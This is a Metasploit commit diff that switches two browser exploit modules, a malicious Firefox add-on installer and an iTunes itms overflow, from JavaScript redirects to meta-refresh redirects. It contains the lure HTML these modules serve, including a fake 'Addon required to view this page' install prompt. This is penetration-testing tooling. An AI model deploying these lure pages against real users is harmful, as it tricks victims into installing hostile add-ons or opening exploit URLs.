Land rapid7#8910, Use meta redirect instead of JS redirect in 2 modules

pbarry-r7 · pbarry-r7 · commit 6051a1a1c103 · 2017-09-01T13:50:02.000-05:00
diff --git a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
@@ -65,9 +65,9 @@ def on_request_uri(cli, request)
   end
 
   def generate_html
-    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>\n|
+    html  = %Q|<html><head><title>Loading, Please Wait...</title>\n|
+    html << %Q|<meta http-equiv="refresh" content="0; url=addon.xpi"></head>\n|
     html << %Q|<body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>\n|
-    html << %Q|<script>window.location.href="addon.xpi";</script>\n|
     html << %Q|</body></html>|
     return html
   end
diff --git a/modules/exploits/multi/browser/itms_overflow.rb b/modules/exploits/multi/browser/itms_overflow.rb
@@ -98,11 +98,14 @@ def generate_itms_page(p)
     # Return back an example URL.  Using an iframe doesn't work with all
     # browsers, but that's easy enough to fix if you need to.
     return String(<<-EOS)
-<html><head><title>iTunes loading . . .</title></head>
+<html>
+<head>
+<title>iTunes loading . . .</title>
+<meta http-equiv="refresh" content="0; url='#{itms_base_url}'">
+</head>
 <body>
 <p>iTunes should open automatically, but if it doesn't, click to
 <a href="#{itms_base_url}">continue</a>.</p>
-<script>document.location.assign("#{itms_base_url}");</script>
 </body>
 </html>
 EOS
